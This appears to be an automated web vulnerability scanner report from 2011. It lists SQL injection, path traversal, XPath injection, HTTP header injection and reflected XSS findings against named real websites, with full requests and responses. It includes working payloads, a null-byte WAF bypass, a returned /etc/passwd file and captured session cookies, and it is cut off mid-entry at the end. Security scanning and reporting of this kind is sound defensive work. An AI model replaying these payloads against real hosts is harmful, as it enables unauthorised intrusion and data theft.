User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1''
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://layserfreiwald.com/attorneys.html?mode=view&AID=8

Response 2

HTTP/1.1 301 Moved Permanently
Date: Thu, 12 May 2011 18:36:38 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.3.2
Set-Cookie: sl_session=2d642a2ebf431247abb7d7a4aa556bba; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: http://www.superlawyers.com/pennsylvania/lawyer/Glenn-A-Ellis/8480c83d-644a-4fd5-9e3b-15644c36fe5e.html
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 0

1.105. http://www.wi-ala.org/ClubPortal/wala/NewsView.cfm [NewsID parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.wi-ala.org
Path:   /ClubPortal/wala/NewsView.cfm

Issue detail

The NewsID parameter appears to be vulnerable to SQL injection attacks. The payloads 46402591%20or%201%3d1--%20 and 46402591%20or%201%3d2--%20 were each submitted in the NewsID parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /ClubPortal/wala/NewsView.cfm?clubID=177&NewsID=383746402591%20or%201%3d1--%20 HTTP/1.1
Host: www.wi-ala.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.wi-ala.org/ClubPortal/wala/
Cookie: CFID=26522772; CFTOKEN=a920774421289d5b-E56611D9-9F3F-43FD-97A14D1C9ED5D3BD; CFGLOBALS=urltoken%3DCFID%23%3D26522772%26CFTOKEN%23%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23lastvisit%3D%7Bts%20%272011%2D05%2D12%2011%3A09%3A22%27%7D%23timecreated%3D%7Bts%20%272011%2D05%2D12%2011%3A09%3A22%27%7D%23hitcount%3D2%23cftoken%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23cfid%3D26522772%23; __utma=138668213.1272503015.1305223771.1305223771.1305223771.1; __utmb=138668213.1.10.1305223771; __utmc=138668213; __utmz=138668213.1305223771.1.1.utmcsr=elawmarketing.com|utmccn=(referral)|utmcmd=referral|utmcct=/portfolio/websites/wisconsin-chapter-association-legal-administrators

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 18:10:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D26522772%26CFTOKEN%23%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23lastvisit%3D%7Bts%20%272011%2D05%2D12%2011%3A10%3A24%27%7D%23timecreated%3D%7Bts%20%272011%2D05%2D12%2011%3A09%3A22%27%7D%23hitcount%3D3%23cftoken%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23cfid%3D26522772%23;expires=Sat, 04-May-2041 18:10:24 GMT;path=/
Content-Type: text/html; charset=UTF-8


<!--PUT ANY NEEDED DATA QUERIES HERE--->


   <html>
   <head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks
...[SNIP]...
<b>beats chasing a burning dog</b></td>
   </tr>
   <tr height="100">
       <td class="Text" colspan="3" valign="top" align="left">
       
       </td>
   </tr>
   </table>
   
       </td>
   </tr>
   
   </table>
   
   
</td>

</tr>
</table>

</td>
</tr>
</table>

<table border="0" align="center" cellspacing="0" cellpadding="0" width="762" bgcolor="#FFFFFF">
   <tr>
   <td align="center">

   
   <table border="0" bgcolor="#B1AFB0" cellspacing="0" cellpadding="0" width="100%" align="center">
    <tr>
   
    <td align="center">




   <table cellspacing="0" cellpadding="0" width="100%" align="center" bgcolor="#b1afb0" border="0">
<tbody>
<tr>
<td align="center" width="800">
<table cellspacing="0" cellpadding="4" border="0" style="width: 142px; color: rgb(255,255,255); height: 25px">
<tbody>
<tr>
<td align="center"><a style="font-weight: bold; color: rgb(255,255,255); text-decoration: none" href="/clubportal/wala/Page.cfm?clubID=177&amp;pubmenuoptID=10458">Contact Us</a></td>
</tr>
</tbody>
</table>
<table cellspacing="0" cellpadding="4" width="100%" border="0" style="color: rgb(255,255,255)">
<tbody>
<tr>
<td align="left">Copyright 2010 All rights reserved.</td>
<td align="right"><a target="_blank" style="color: rgb(255,255,255)" href="http://www.elawmarketing.com/">Site provided by eLawMarketing</a></td>
</tr>
</tbody>
</table>
</td>
</tr>
</tbody>
</table>

    </td>
    </tr>
   </table>
   

<table align="center" width="100%" cellspacing="0" cellpadding="4" height="15" class="goclubfootertable">    
<tr>
<td align="center"><span class="fineprint">Site provided by</span><br><a href="http://www.elawmarketing.com" target="_blank"><img src="/clubpo
...[SNIP]...

Request 2

GET /ClubPortal/wala/NewsView.cfm?clubID=177&NewsID=383746402591%20or%201%3d2--%20 HTTP/1.1
Host: www.wi-ala.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.wi-ala.org/ClubPortal/wala/
Cookie: CFID=26522772; CFTOKEN=a920774421289d5b-E56611D9-9F3F-43FD-97A14D1C9ED5D3BD; CFGLOBALS=urltoken%3DCFID%23%3D26522772%26CFTOKEN%23%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23lastvisit%3D%7Bts%20%272011%2D05%2D12%2011%3A09%3A22%27%7D%23timecreated%3D%7Bts%20%272011%2D05%2D12%2011%3A09%3A22%27%7D%23hitcount%3D2%23cftoken%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23cfid%3D26522772%23; __utma=138668213.1272503015.1305223771.1305223771.1305223771.1; __utmb=138668213.1.10.1305223771; __utmc=138668213; __utmz=138668213.1305223771.1.1.utmcsr=elawmarketing.com|utmccn=(referral)|utmcmd=referral|utmcct=/portfolio/websites/wisconsin-chapter-association-legal-administrators

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 18:10:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D26522772%26CFTOKEN%23%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23lastvisit%3D%7Bts%20%272011%2D05%2D12%2011%3A10%3A24%27%7D%23timecreated%3D%7Bts%20%272011%2D05%2D12%2011%3A09%3A22%27%7D%23hitcount%3D3%23cftoken%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23cfid%3D26522772%23;expires=Sat, 04-May-2041 18:10:24 GMT;path=/
Content-Type: text/html; charset=UTF-8


<!--PUT ANY NEEDED DATA QUERIES HERE--->


   <html>
   <head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks
...[SNIP]...
<b></b></td>
   </tr>
   <tr height="100">
       <td class="Text" colspan="3" valign="top" align="left">
       
       </td>
   </tr>
   </table>
   
       </td>
   </tr>
   
   </table>
   
   
</td>

</tr>
</table>

</td>
</tr>
</table>

<table border="0" align="center" cellspacing="0" cellpadding="0" width="762" bgcolor="#FFFFFF">
   <tr>
   <td align="center">

   
   <table border="0" bgcolor="#B1AFB0" cellspacing="0" cellpadding="0" width="100%" align="center">
    <tr>
   
    <td align="center">




   <table cellspacing="0" cellpadding="0" width="100%" align="center" bgcolor="#b1afb0" border="0">
<tbody>
<tr>
<td align="center" width="800">
<table cellspacing="0" cellpadding="4" border="0" style="width: 142px; color: rgb(255,255,255); height: 25px">
<tbody>
<tr>
<td align="center"><a style="font-weight: bold; color: rgb(255,255,255); text-decoration: none" href="/clubportal/wala/Page.cfm?clubID=177&amp;pubmenuoptID=10458">Contact Us</a></td>
</tr>
</tbody>
</table>
<table cellspacing="0" cellpadding="4" width="100%" border="0" style="color: rgb(255,255,255)">
<tbody>
<tr>
<td align="left">Copyright 2010 All rights reserved.</td>
<td align="right"><a target="_blank" style="color: rgb(255,255,255)" href="http://www.elawmarketing.com/">Site provided by eLawMarketing</a></td>
</tr>
</tbody>
</table>
</td>
</tr>
</tbody>
</table>

    </td>
    </tr>
   </table>
   

<table align="center" width="100%" cellspacing="0" cellpadding="4" height="15" class="goclubfootertable">    
<tr>
<td align="center"><span class="fineprint">Site provided by</span><br><a href="http://www.elawmarketing.com" target="_blank"><img src="/clubportal/images/logos/elawlogo3
...[SNIP]...
1.106. http://www.wiggin.com/showarea.aspx [Show parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wiggin.com
Path:   /showarea.aspx

Issue detail

The Show parameter appears to be vulnerable to SQL injection attacks. The payload %00' was submitted in the Show parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /showarea.aspx?Show=10669%00' HTTP/1.1
Host: www.wiggin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.wiggin.com/areas.aspx
Cookie: ASP.NET_SessionId=3rofrk45wpkvtc3h2vctwuid; __utma=159286716.445477705.1305216148.1305216148.1305216148.1; __utmb=159286716.2.10.1305216148; __utmc=159286716; __utmz=159286716.1305216148.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Wiggin%20and%20Dana

Response

HTTP/1.1 500 Internal Server Error
Date: Thu, 12 May 2011 16:04:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 4564

<html>
<head>
<title>Unclosed quotation mark before the character string ''.</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black
...[SNIP]...
2. File path traversal  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hartfordbusiness.com
Path:   /fs_webkit/fs_css_processor.php

Issue detail

The src parameter is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server.

The payload /template/hbj/forms.fcss../../../../../../../../etc/passwd was submitted in the src parameter. The requested file was returned in the application's response.

Issue background

File path traversal vulnerabilities arise when user-controllable data is used within a filesystem operation in an unsafe manner. Typically, a user-supplied filename is appended to a directory prefix in order to read or write the contents of a file. If vulnerable, an attacker can supply path traversal sequences (using dot-dot-slash characters) to break out of the intended directory and read or write files elsewhere on the filesystem.

This is usually a very serious vulnerability, enabling an attacker to access sensitive files containing configuration data, passwords, database records, log data, source code, and program scripts and binaries.

Issue remediation

Ideally, application functionality should be designed in such a way that user-controllable data does not need to be passed to filesystem operations. This can normally be achieved either by referencing known files via an index number rather than their name, and by using application-generated filenames to save user-supplied file content.

If it is considered unavoidable to pass user-controllable data to a filesystem operation, three layers of defence can be employed to prevent path traversal attacks:

Request

GET /fs_webkit/fs_css_processor.php?src=/template/hbj/forms.fcss../../../../../../../../etc/passwd&color=primary!891709*sidebar!EEE1CE*link!0000FF*link_hover!ff0000 HTTP/1.1
Host: www.hartfordbusiness.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.hartfordbusiness.com/news14300.html8d3ba%22%3E%3Cscript%3Ealert(%22GHDB%22)%3C/script%3E22db1e31600
Cookie: PHPSESSID=cba35d48e37d667e2a7b4af26a795cdd

Response

HTTP/1.1 200 OK
Date: Fri, 13 May 2011 00:42:48 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.10-2ubuntu6
Vary: Accept-Encoding
Connection: close
Content-Type: text/css
Content-Length: 6122

/* WARNING: I COULDN'T WRITE THIS FILE, THE DIRECTORY IS WRITE PROTECTED */
/* TRIED TO WRITE FILE : /app/production/nebm/universal/template/hbj/forms.css../../../../../../../../etc/passwd*/
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/
...[SNIP]...
p:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:107::/var/run/dbus:/bin/false
haldaemon:x:103:108:Hardwa
...[SNIP]...
3. XPath injection  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.usatoday.com
Path:   /money/autos/2009-04-20-gm-dealers-bankruptcy_N.htm

Issue detail

The REST URL parameter 3 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 3, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Issue background

XPath injection vulnerabilities arise when user-controllable data is incorporated into XPath queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Depending on the purpose for which the vulnerable query is being used, an attacker may be able to exploit an XPath injection flaw to read sensitive application data or interfere with application logic.

Issue remediation

User input should be strictly validated before being incorporated into XPath queries. In most cases, it will be appropriate to accept input containing only short alhanumeric strings. At the very least, input containing any XPath metacharacters such as " ' / @ = * [ ] ( and ) should be rejected.

Request

GET /money/autos/2009-04-20-gm-dealers-bankruptcy_N.htm' HTTP/1.1
Host: www.usatoday.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Thu, 12 May 2011 16:59:28 GMT
Connection: close
Content-Length: 2866

<b>This is an unclosed string.</b><br/> at MS.Internal.Xml.XPath.XPathScanner.ScanString()<br/> at MS.Internal.Xml.XPath.XPathScanner.NextLex()<br/> at MS.Internal.Xml.XPath.XPathParser.ParsePri
...[SNIP]...
<br/> at System.Xml.XPath.XPathExpression.Compile(String xpath, IXmlNamespaceResolver nsResolver)<br/>
...[SNIP]...
4. HTTP header injection  previous  next
There are 2 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.

4.1. http://ad.doubleclick.net/ad/N3282.nytimes.comSD6440/B3948326.5 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N3282.nytimes.comSD6440/B3948326.5

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 3ca7a%0d%0a43c5b8cf812 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /3ca7a%0d%0a43c5b8cf812/N3282.nytimes.comSD6440/B3948326.5;sz=88x31;pc=nyt160585A252821;ord=2011.05.12.16.57.32 HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nytimes.com/2010/08/22/sports/cycling/22armstrong.html?59261%22%3E%3Cscript%3Ealert(1)%3C/script%3E223d24b026d=1
Cookie: id=c60bd0733000097|2258832/785797/15105|t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/3ca7a
43c5b8cf812/N3282.nytimes.comSD6440/B3948326.5;sz=88x31;pc=nyt160585A252821;ord=2011.05.12.16.57.32:
Date: Thu, 12 May 2011 19:54:44 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>
4.2. http://ad.doubleclick.net/adi/N3905.372584.HARTFORDBUSINESS.CO/B5470639.3 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3905.372584.HARTFORDBUSINESS.CO/B5470639.3

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 58306%0d%0a81ee06eb858 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /58306%0d%0a81ee06eb858/N3905.372584.HARTFORDBUSINESS.CO/B5470639.3;sz=300x250;ord=[timestamp]? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.hartfordbusiness.com/news14300.html8d3ba%22%3E%3Cscript%3Ealert(%22GHDB%22)%3C/script%3E22db1e31600
Cookie: id=c60bd0733000097|2258832/785797/15105|t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/58306
81ee06eb858/N3905.372584.HARTFORDBUSINESS.CO/B5470639.3;sz=300x250;ord=[timestamp]:
Date: Fri, 13 May 2011 00:43:02 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>
5. Cross-site scripting (reflected)  previous  next
There are 109 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

5.1. http://ds.addthis.com/red/psi/sites/www.dmoc.com/p.json [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.dmoc.com/p.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 216f1<script>alert(1)</script>03ce066cb79 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /red/psi/sites/www.dmoc.com/p.json?callback=_ate.ad.hpr216f1<script>alert(1)</script>03ce066cb79&uid=4dc048d9159e4ae3&url=http%3A%2F%2Fwww.dmoc.com%2Fpractice&ref=http%3A%2F%2Fwww.dmoc.com%2F&1gd1nk7 HTTP/1.1
Host: ds.addthis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh42.html
Cookie: uid=4dc048d9159e4ae3; psc=4; loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; dt=X; di=%7B%7D..1305216717.1FE|1305216717.1OD|1305216717.60|1305219565.1EY; uit=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 131
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Thu, 12 May 2011 18:08:46 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Sat, 11 Jun 2011 18:08:46 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Thu, 12 May 2011 18:08:46 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 12 May 2011 18:08:46 GMT
Connection: close

_ate.ad.hpr216f1<script>alert(1)</script>03ce066cb79({"urls":[],"segments" : [],"loc": "MjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg=="})
5.2. http://ds.addthis.com/red/psi/sites/www.elawmarketing.com/p.json [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.elawmarketing.com/p.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload c169a<script>alert(1)</script>da128c23be7 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /red/psi/sites/www.elawmarketing.com/p.json?callback=_ate.ad.hprc169a<script>alert(1)</script>da128c23be7&uid=4dc048d9159e4ae3&url=http%3A%2F%2Fwww.elawmarketing.com%2Fabout%2Fstaff&ref=http%3A%2F%2Fwww.elawmarketing.com%2Fabout%2Fclients&1309hcm HTTP/1.1
Host: ds.addthis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh42.html
Cookie: uid=4dc048d9159e4ae3; psc=4; loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; dt=X; di=%7B%7D..1305216717.1FE|1305216717.1OD|1305216717.60; uit=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 131
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Thu, 12 May 2011 16:35:18 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Sat, 11 Jun 2011 16:35:18 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Thu, 12 May 2011 16:35:18 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 12 May 2011 16:35:18 GMT
Connection: close

_ate.ad.hprc169a<script>alert(1)</script>da128c23be7({"urls":[],"segments" : [],"loc": "MjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg=="})
5.3. http://ds.addthis.com/red/psi/sites/www.letipli.com/p.json [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.letipli.com/p.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload f28a5<script>alert(1)</script>3d1c81797c5 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /red/psi/sites/www.letipli.com/p.json?callback=_ate.ad.hprf28a5<script>alert(1)</script>3d1c81797c5&uid=4dc048d9159e4ae3&url=http%3A%2F%2Fwww.letipli.com%2Fmember_details.asp8e4b7--%253E%253Cscript%253Ealert(%2522GHDB%2522)%253C%2Fscript%253E76ff3e246a7&ref=http%3A%2F%2Fburp%2Fshow%2F16&1jbi7oi HTTP/1.1
Host: ds.addthis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh42.html
Cookie: uid=4dc048d9159e4ae3; psc=4; loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; dt=X; di=%7B%7D..1305216717.1FE|1305216717.1OD|1305216717.60|1305219565.1EY; uit=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 131
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Fri, 13 May 2011 00:42:40 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Sun, 12 Jun 2011 00:42:40 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Fri, 13 May 2011 00:42:40 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 13 May 2011 00:42:40 GMT
Connection: close

_ate.ad.hprf28a5<script>alert(1)</script>3d1c81797c5({"urls":[],"segments" : [],"loc": "MjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg=="})
5.4. http://ds.addthis.com/red/psi/sites/www.pomerantzlaw.com/p.json [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.pomerantzlaw.com/p.json

Issue detail

